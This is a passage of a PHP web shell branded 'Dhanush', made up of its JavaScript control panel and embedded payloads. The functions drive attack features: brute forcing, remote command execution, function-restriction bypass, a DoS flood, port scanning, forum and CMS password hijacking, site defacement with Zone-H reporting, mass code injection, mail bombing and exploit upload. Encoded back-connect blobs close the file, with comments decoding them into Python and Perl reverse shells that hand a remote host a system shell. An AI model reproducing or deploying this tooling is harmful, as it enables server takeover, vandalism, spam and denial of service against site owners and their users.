7101 document.getElementById("showmaindata").innerHTML=waitstate;
7102 var ajaxRequest;
7103 ajaxRequest = new XMLHttpRequest();
7104
7105 ajaxRequest.onreadystatechange = function()
7106 {
7107 if(ajaxRequest.readyState == 4)
7108 {
7109 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
7110 setpath(mydir);
7111 document.getElementById("crdir").innerHTML=myurl;
7112 }
7113 }
7114
7115 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
7116 ajaxRequest.send(null);
7117}
7118function getname(sitename)
7119{
7120 document.getElementById("showsite").innerHTML=waitstate;
7121 var ajaxRequest;
7122 ajaxRequest = new XMLHttpRequest();
7123
7124 ajaxRequest.onreadystatechange = function()
7125 {
7126 if(ajaxRequest.readyState == 4)
7127 {
7128 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
7129 }
7130 }
7131
7132 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
7133 ajaxRequest.send(null);
7134}
7135function myaction(myfileaction,chmode)
7136{
7137 var mytype = document.getElementsByName('actbox[]');
7138 var mychoice = new Array();
7139
7140 for (var i = 0, length = mytype.length; i < length; i++)
7141 {
7142 if (mytype[i].checked)
7143 mychoice[i] = mytype[i].value;
7144 }
7145
7146 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
7147
7148 document.getElementById("showmydata").className = "fixedbox";
7149 document.getElementById("showmydata").innerHTML=waitstate;
7150 var ajaxRequest;
7151 ajaxRequest = new XMLHttpRequest();
7152
7153 ajaxRequest.onreadystatechange = function()
7154 {
7155 if(ajaxRequest.readyState == 4)
7156 {
7157 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7158 }
7159 }
7160
7161 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7162 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7163 ajaxRequest.send(params);
7164}
7165function editdata()
7166{
7167 var result = "", // initialize list
7168 i,dbname,tablename;
7169 // iterate through arguments
7170 for (i = 1; i < arguments.length; i++)
7171 {
7172 if(i%2 == 0)
7173 result += arguments[i]+'=';
7174 else
7175 result += arguments[i]+'&';
7176 }
7177 result = result.slice(0, -1);
7178
7179 dbname = arguments[3];
7180 tablename = arguments[5];
7181 var result=result.replace(/dhanush_/g,"");
7182 var params = arguments[0]+"="+result;
7183
7184 document.getElementById("showsql").innerHTML=waitstate;
7185 var ajaxRequest;
7186 ajaxRequest = new XMLHttpRequest();
7187
7188 ajaxRequest.onreadystatechange = function()
7189 {
7190 if(ajaxRequest.readyState == 4)
7191 {
7192 viewtables('listTables',dbname,tablename);
7193 }
7194 }
7195
7196 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7197 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7198 ajaxRequest.send(params);
7199}
7200function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
7201{
7202 document.getElementById("showsql").innerHTML=waitstate;
7203 var ajaxRequest;
7204 ajaxRequest = new XMLHttpRequest();
7205
7206 ajaxRequest.onreadystatechange = function()
7207 {
7208 if(ajaxRequest.readyState == 4)
7209 {
7210 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
7211 }
7212 }
7213
7214 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
7215 ajaxRequest.send(null);
7216}
7217function mydatabase(server,username,password)
7218{
7219 document.getElementById("showsql").innerHTML=waitstate;
7220 var ajaxRequest;
7221 ajaxRequest = new XMLHttpRequest();
7222
7223 ajaxRequest.onreadystatechange = function()
7224 {
7225 if(ajaxRequest.readyState == 4)
7226 {
7227 mydatago();
7228 }
7229 }
7230
7231 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
7232 ajaxRequest.send(null);
7233}
7234function mydatago()
7235{
7236 var ajaxRequest;
7237 ajaxRequest = new XMLHttpRequest();
7238
7239 ajaxRequest.onreadystatechange = function()
7240 {
7241 if(ajaxRequest.readyState == 4)
7242 {
7243 document.getElementById("datatable").style.display = 'none';
7244 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
7245 }
7246 }
7247
7248 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
7249 ajaxRequest.send(null);
7250}
7251function bruteforce(prototype,serverport,login,dict)
7252{
7253 var mytype = document.getElementsByName('mytype');
7254 for (var i = 0, length = mytype.length; i < length; i++)
7255 {
7256 if (mytype[i].checked)
7257 break;
7258 }
7259 var getreverse = 0;
7260 if(document.getElementById('reverse').checked == true)
7261 getreverse = 1;
7262 else
7263 getreverse = 0;
7264
7265 document.getElementById("showbrute").innerHTML=waitstate;
7266 var ajaxRequest;
7267 ajaxRequest = new XMLHttpRequest();
7268
7269 ajaxRequest.onreadystatechange = function()
7270 {
7271 if(ajaxRequest.readyState == 4)
7272 {
7273 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
7274 }
7275 }
7276
7277 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
7278 ajaxRequest.send(null);
7279}
7280function executemyfile(action,executepath,execute)
7281{
7282 document.getElementById("showmydata").className = "fixedbox";
7283 document.getElementById("showmydata").innerHTML=waitstate;
7284 var ajaxRequest;
7285 ajaxRequest = new XMLHttpRequest();
7286
7287 ajaxRequest.onreadystatechange = function()
7288 {
7289 if(ajaxRequest.readyState == 4)
7290 {
7291 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7292 }
7293 }
7294
7295 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
7296 ajaxRequest.send(null);
7297}
7298function maindata(myaction,dir)
7299{
7300 document.getElementById("showmaindata").innerHTML=waitstate;
7301 var ajaxRequest;
7302 ajaxRequest = new XMLHttpRequest();
7303
7304 ajaxRequest.onreadystatechange = function()
7305 {
7306 if(ajaxRequest.readyState == 4)
7307 {
7308 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
7309 document.getElementById("showdir").innerHTML="";
7310 }
7311 }
7312
7313 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
7314 ajaxRequest.send(null);
7315}
7316function manuallyscriptfn(sctype,passwd)
7317{
7318 var message = encodeURIComponent(passwd);
7319 var params = sctype+"="+sctype+"&passwd="+passwd;
7320 document.getElementById("showdata").innerHTML=waitstate;
7321 var ajaxRequest;
7322 ajaxRequest = new XMLHttpRequest();
7323
7324 ajaxRequest.onreadystatechange = function()
7325 {
7326 if(ajaxRequest.readyState == 3)
7327 {
7328 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
7329 }
7330 }
7331
7332 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7333 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7334 ajaxRequest.send(params);
7335}
7336function my404page(message)
7337{
7338 var message = encodeURIComponent(message);
7339 var params = "404page=404page&message="+message;
7340 document.getElementById("showdata").innerHTML=waitstate;
7341 var ajaxRequest;
7342 ajaxRequest = new XMLHttpRequest();
7343
7344 ajaxRequest.onreadystatechange = function()
7345 {
7346 if(ajaxRequest.readyState == 4)
7347 {
7348 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
7349 }
7350 }
7351
7352 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7353 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7354 ajaxRequest.send(params);
7355}
7356function executemyfn(executepath,executemycmd)
7357{
7358 var ajaxRequest,app;
7359 ajaxRequest = new XMLHttpRequest();
7360
7361 ajaxRequest.onreadystatechange = function()
7362 {
7363 if(ajaxRequest.readyState == 4)
7364 {
7365 app = "$ " + executemycmd + " : " + ajaxRequest.responseText + "\n";
7366 document.getElementById("showexecute").innerHTML=app+document.getElementById("showexecute").innerHTML;
7367 }
7368 }
7369
7370 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
7371 ajaxRequest.send(null);
7372}
7373function zoneh(defacer,hackmode,reason,domain)
7374{
7375 var domain = encodeURIComponent(domain);
7376 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
7377 document.getElementById("showzone").innerHTML=waitstate;
7378 var ajaxRequest;
7379 ajaxRequest = new XMLHttpRequest();
7380
7381 ajaxRequest.onreadystatechange = function()
7382 {
7383 if(ajaxRequest.readyState == 4)
7384 {
7385 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
7386 }
7387 }
7388
7389 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7390 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7391 ajaxRequest.send(params);
7392}
7393function savemyfile(file,content)
7394{
7395 var content = encodeURIComponent(content);
7396 var params = "content="+content+"&file="+file;
7397 document.getElementById("showmydata").innerHTML=waitstate;
7398 document.getElementById("showdir").innerHTML="";
7399 var ajaxRequest;
7400 ajaxRequest = new XMLHttpRequest();
7401
7402 ajaxRequest.onreadystatechange = function()
7403 {
7404 if(ajaxRequest.readyState == 4)
7405 {
7406 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7407 }
7408 }
7409
7410 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7411 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7412 ajaxRequest.send(params);
7413}
7414function renamefun(file,to)
7415{
7416 document.getElementById("showmydata").innerHTML=waitstate;
7417 var ajaxRequest;
7418 ajaxRequest = new XMLHttpRequest();
7419
7420 ajaxRequest.onreadystatechange = function()
7421 {
7422 if(ajaxRequest.readyState == 4)
7423 {
7424 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7425 }
7426 }
7427
7428 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
7429 ajaxRequest.send(null);
7430}
7431function changeperms(chmode,myfilename)
7432{
7433 document.getElementById("showmydata").innerHTML=waitstate;
7434 var ajaxRequest;
7435 ajaxRequest = new XMLHttpRequest();
7436
7437 ajaxRequest.onreadystatechange = function()
7438 {
7439 if(ajaxRequest.readyState == 4)
7440 {
7441 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7442 }
7443 }
7444
7445 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
7446 ajaxRequest.send(null);
7447}
7448function defacefun(deface)
7449{
7450 var ajaxRequest;
7451 ajaxRequest = new XMLHttpRequest();
7452
7453 ajaxRequest.onreadystatechange = function()
7454 {
7455 if(ajaxRequest.readyState == 4)
7456 {
7457 alert(ajaxRequest.responseText);
7458 }
7459 }
7460
7461 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
7462 ajaxRequest.send(null);
7463}
7464function cancel()
7465{
7466 document.getElementById("showmydata").className = "";
7467 document.getElementById("showmydata").innerHTML='';
7468}
7469function fileaction(myaction,myfilepath)
7470{
7471 document.getElementById("showmydata").className = "fixedbox";
7472 document.getElementById("showmydata").innerHTML=waitstate;
7473 var ajaxRequest;
7474 ajaxRequest = new XMLHttpRequest();
7475
7476 ajaxRequest.onreadystatechange = function()
7477 {
7478 if(ajaxRequest.readyState == 4)
7479 {
7480 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7481 }
7482 }
7483
7484 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
7485 ajaxRequest.send(null);
7486}
7487function bypassfun(funct,functvalue,optiontype)
7488{
7489 document.getElementById("showmydata").className = "fixedbox";
7490 document.getElementById("showmydata").innerHTML=waitstate;
7491 var ajaxRequest;
7492 ajaxRequest = new XMLHttpRequest();
7493 ajaxRequest.onreadystatechange = function()
7494 {
7495 if(ajaxRequest.readyState == 4)
7496 {
7497 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7498 }
7499 }
7500
7501 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
7502 ajaxRequest.send(null);
7503}
7504function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
7505{
7506 document.getElementById("showdos").innerHTML=waitstate;
7507 var ajaxRequest;
7508 ajaxRequest = new XMLHttpRequest();
7509
7510 ajaxRequest.onreadystatechange = function()
7511 {
7512 if(ajaxRequest.readyState == 4)
7513 {
7514 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
7515 }
7516 }
7517
7518 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
7519 ajaxRequest.send(null);
7520}
7521function createfile(filecreator,filecontent)
7522{
7523 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
7524 var filecontent = encodeURIComponent(filecontent);
7525 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
7526 document.getElementById("showdir").innerHTML=waitstate;
7527 var ajaxRequest;
7528 ajaxRequest = new XMLHttpRequest();
7529
7530 ajaxRequest.onreadystatechange = function()
7531 {
7532 if(ajaxRequest.readyState == 4)
7533 {
7534 gethome('home',mm);
7535 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
7536 document.getElementById("showmydata").innerHTML="";
7537 }
7538 }
7539
7540 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7541 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7542 ajaxRequest.send(params);
7543}
7544function createdir(create,createfolder)
7545{
7546 document.getElementById("showmydata").className = "fixedbox";
7547 document.getElementById("showmydata").innerHTML=waitstate;
7548 var ajaxRequest;
7549 ajaxRequest = new XMLHttpRequest();
7550
7551 ajaxRequest.onreadystatechange = function()
7552 {
7553 if(ajaxRequest.readyState == 4)
7554 {
7555 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7556 }
7557 }
7558
7559 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
7560 ajaxRequest.send(null);
7561}
7562function codeinsert(code)
7563{
7564 var code = encodeURIComponent(code);
7565 var params = "getcode="+code;
7566 document.getElementById("showcode").innerHTML=waitstate;
7567 var ajaxRequest;
7568
7569 ajaxRequest = new XMLHttpRequest();
7570
7571 ajaxRequest.onreadystatechange = function()
7572 {
7573 if(ajaxRequest.readyState == 4)
7574 {
7575 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
7576 }
7577 }
7578
7579 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7580 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7581 ajaxRequest.send(params);
7582}
7583function getmydefacedata(mydata)
7584{
7585 document.getElementById("showmydeface").innerHTML=waitstate;
7586 var ajaxRequest;
7587 ajaxRequest = new XMLHttpRequest();
7588
7589 ajaxRequest.onreadystatechange = function()
7590 {
7591 if(ajaxRequest.readyState == 4)
7592 {
7593 document.getElementById("showmydeface").innerHTML=ajaxRequest.responseText;
7594 }
7595 }
7596
7597 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
7598 ajaxRequest.send(null);
7599}
7600function getmydata(mydata)
7601{
7602 document.getElementById("showmydata").className = "fixedbox";
7603 document.getElementById("showmydata").innerHTML=waitstate;
7604 var ajaxRequest;
7605 ajaxRequest = new XMLHttpRequest();
7606
7607 ajaxRequest.onreadystatechange = function()
7608 {
7609 if(ajaxRequest.readyState == 4)
7610 {
7611 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7612 }
7613 }
7614
7615 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
7616 ajaxRequest.send(null);
7617}
7618function getdata(mydata,myfile)
7619{
7620 document.getElementById("showdata").innerHTML=waitstate;
7621 var ajaxRequest;
7622 ajaxRequest = new XMLHttpRequest();
7623
7624 ajaxRequest.onreadystatechange = function()
7625 {
7626 if(ajaxRequest.readyState == 3)
7627 {
7628 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
7629 }
7630 }
7631
7632 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
7633 ajaxRequest.send(null);
7634}
7635function getport(host,protocol,start,end)
7636{
7637 document.getElementById("showports").innerHTML=waitstate;
7638 var ajaxRequest;
7639 ajaxRequest = new XMLHttpRequest();
7640
7641 ajaxRequest.onreadystatechange = function()
7642 {
7643 if(ajaxRequest.readyState == 4)
7644 {
7645 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
7646 }
7647 }
7648
7649 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
7650 ajaxRequest.send(null);
7651}
7652function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uname,newpass)
7653{
7654 document.getElementById("showchangepass").innerHTML=waitstate;
7655 var ajaxRequest;
7656 ajaxRequest = new XMLHttpRequest();
7657
7658 ajaxRequest.onreadystatechange = function()
7659 {
7660 if(ajaxRequest.readyState == 4)
7661 {
7662 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
7663 }
7664 }
7665
7666 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uname=" + uname + "&newpass=" + newpass, true);
7667 ajaxRequest.send(null);
7668}
7669function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,f5)
7670{
7671 var index = encodeURIComponent(index);
7672 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&f5="+f5;
7673 document.getElementById("showdeface").innerHTML=waitstate;
7674 var ajaxRequest;
7675 ajaxRequest = new XMLHttpRequest();
7676
7677 ajaxRequest.onreadystatechange = function()
7678 {
7679 if(ajaxRequest.readyState == 4)
7680 {
7681 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
7682 }
7683 }
7684
7685 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7686 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7687 ajaxRequest.send(params);
7688}
7689function codeinjector(pathtomass,mode,filetype,injectthis)
7690{
7691 var injectthis = encodeURIComponent(injectthis);
7692 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
7693 document.getElementById("showinject").innerHTML=waitstate;
7694 var ajaxRequest;
7695 ajaxRequest = new XMLHttpRequest();
7696
7697 ajaxRequest.onreadystatechange = function()
7698 {
7699 if(ajaxRequest.readyState == 3)
7700 {
7701 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
7702 }
7703 }
7704
7705 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7706 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7707 ajaxRequest.send(params);
7708}
7709function sendmail(mailfunction,to,subject,message,from,times,padding)
7710{
7711 var message = encodeURIComponent(message);
7712 if(mailfunction == "massmailing")
7713 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
7714 else if(mailfunction == "dobombing")
7715 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
7716 document.getElementById("showmail").innerHTML=waitstate;
7717 var ajaxRequest;
7718 ajaxRequest = new XMLHttpRequest();
7719
7720 ajaxRequest.onreadystatechange = function()
7721 {
7722 if(ajaxRequest.readyState == 4)
7723 {
7724 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
7725 }
7726 }
7727
7728 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7729 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7730 ajaxRequest.send(params);
7731}
7732function execode(code)
7733{
7734 var intext = document.getElementById('intext').checked;
7735 var message = encodeURIComponent(message);
7736 var params = "code="+code+"&intext="+intext;
7737 document.getElementById("showresult").innerHTML=waitstate;
7738 var ajaxRequest;
7739 ajaxRequest = new XMLHttpRequest();
7740
7741 ajaxRequest.onreadystatechange = function()
7742 {
7743 if(ajaxRequest.readyState == 4)
7744 {
7745 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
7746 }
7747 }
7748
7749 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7750 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7751 ajaxRequest.send(params);
7752}
7753function malwarefun(malwork)
7754{
7755 var malpath = document.getElementById('createfile').value;
7756 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
7757 var ajaxRequest;
7758 ajaxRequest = new XMLHttpRequest();
7759
7760 ajaxRequest.onreadystatechange = function()
7761 {
7762 if(ajaxRequest.readyState == 4)
7763 {
7764 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
7765 }
7766 }
7767
7768 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
7769 ajaxRequest.send(null);
7770}
7771function getexploit(wurl,path,functiontype)
7772{
7773 document.getElementById("showexp").innerHTML=waitstate;
7774 var ajaxRequest;
7775 ajaxRequest = new XMLHttpRequest();
7776
7777 ajaxRequest.onreadystatechange = function()
7778 {
7779 if(ajaxRequest.readyState == 4)
7780 {
7781 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
7782 }
7783 }
7784
7785 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
7786 ajaxRequest.send(null);
7787}
7788function showMsg(msg)
7789{
7790 if(msg == 'smf')
7791 {
7792 document.getElementById('tableprefix').value="smf_";
7793 document.getElementById('fid').style.display='block';
7794 document.getElementById('wpress').style.display='none';
7795 document.getElementById('joomla').style.display='none';
7796 }
7797 if(msg == 'mybb')
7798 {
7799 document.getElementById('tableprefix').value="mybb_";
7800 document.getElementById('wpress').style.display='none';
7801 document.getElementById('joomla').style.display='none';
7802 document.getElementById('fid').style.display='block';
7803 }
7804 if(msg == 'ipb' || msg == 'vb')
7805 {
7806 document.getElementById('tableprefix').value="";
7807 document.getElementById('wpress').style.display='none';
7808 document.getElementById('joomla').style.display='none';
7809 document.getElementById('fid').style.display='block';
7810 }
7811 if(msg == 'wp')
7812 {
7813 document.getElementById('tableprefix').value="wp_";
7814 document.getElementById('wpress').style.display='block';
7815 document.getElementById('fid').style.display='none';
7816 document.getElementById('joomla').style.display='none';
7817 }
7818 if(msg == 'joomla')
7819 {
7820 document.getElementById('joomla').style.display='block';
7821 document.getElementById('tableprefix').value="jos_";
7822 document.getElementById('wpress').style.display='none';
7823 document.getElementById('fid').style.display='none';
7824 }
7825}
7826function checkforum(msg)
7827{
7828 if(msg == 'smf')
7829 {
7830 document.getElementById('tableprefix').value="smf_";
7831 document.getElementById('smfipb').style.display='block';
7832 document.getElementById('myjoomla').style.display='none';
7833
7834 }
7835 if(msg == 'phpbb')
7836 {
7837 document.getElementById('tableprefix').value="phpb_";
7838 document.getElementById('myjoomla').style.display='none';
7839 document.getElementById('smfipb').style.display='block';
7840
7841 }
7842 if(msg == 'mybb')
7843 {
7844 document.getElementById('tableprefix').value="mybb_";
7845 document.getElementById('myjoomla').style.display='none';
7846 document.getElementById('smfipb').style.display='none';
7847 }
7848 if(msg == 'vb')
7849 {
7850 document.getElementById('tableprefix').value="";
7851 document.getElementById('myjoomla').style.display='none';
7852 document.getElementById('smfipb').style.display='none';
7853 }
7854 if(msg == 'ipb')
7855 {
7856 document.getElementById('myjoomla').style.display='none';
7857 document.getElementById('smfipb').style.display='block';
7858 document.getElementById('tableprefix').value="";
7859 }
7860 if(msg == 'wp')
7861 {
7862 document.getElementById('tableprefix').value="wp_";
7863 document.getElementById('myjoomla').style.display='block';
7864 document.getElementById('smfipb').style.display='none';
7865 document.getElementById('siteurl').value="http://site/blog";
7866 }
7867 if(msg == 'joomla')
7868 {
7869 document.getElementById('myjoomla').style.display='block';
7870 document.getElementById('tableprefix').value="jos_";
7871 document.getElementById('smfipb').style.display='none';
7872 document.getElementById('siteurl').value="http://site/administrator/";
7873 }
7874}
7875</script>
7876<body>
7877<?php
7878
7879$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
7880/*
7881$back_connect_p --> isinya
7882
7883#!/usr/bin/python
7884
7885import sys, socket, os, subprocess
7886
7887host = sys.argv[1]
7888port = int(sys.argv[2])
7889
7890socket.setdefaulttimeout(60)
7891
7892while 1:
7893 sok = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
7894 sok.connect((host,port))
7895 sok.send("============================================================\n")
7896 sok.send("---------------------------Dhanush--------------------------\n");
7897 sok.send("-----------------------Coded By Arjun-----------------------\n");
7898 sok.send("============================================================\n");
7899 sok.send("--==Systeminfo==--\n")
7900 os.dup2(sok.fileno(),0)
7901 os.dup2(sok.fileno(),1)
7902 os.dup2(sok.fileno(),2)
7903 os.dup2(sok.fileno(),3)
7904 shell = subprocess.call(["uname","-a"])
7905 sok.send("--==User id==--\n")
7906 shell = subprocess.call(["id"])
7907 shell = subprocess.call(["/bin/sh","-i"])
7908
7909*/
7910$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
7911/*
7912$backconnect_perl --> isinya
7913
7914#!/usr/bin/perluse IO::Socket;
7915
7916$system = '/bin/bash';
7917$ARGC=@ARGV;
7918use Socket;
7919use FileHandle;
7920
7921socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
7922connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0])));
7923
7924SOCKET->autoflush();
7925open(STDIN, ">&SOCKET");
7926open(STDOUT,">&SOCKET");
7927open(STDERR,">&SOCKET");
7928print "============================================================\n";
7929print "---------------------------Dhanush--------------------------\n";
7930print "-----------------------Coded By Arjun-----------------------\n";
7931print "============================================================\n\n";
7932system("echo --==Systeminfo==--; uname -a; echo;echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); system($system);
7933#EOF
7934
7935*/
7936
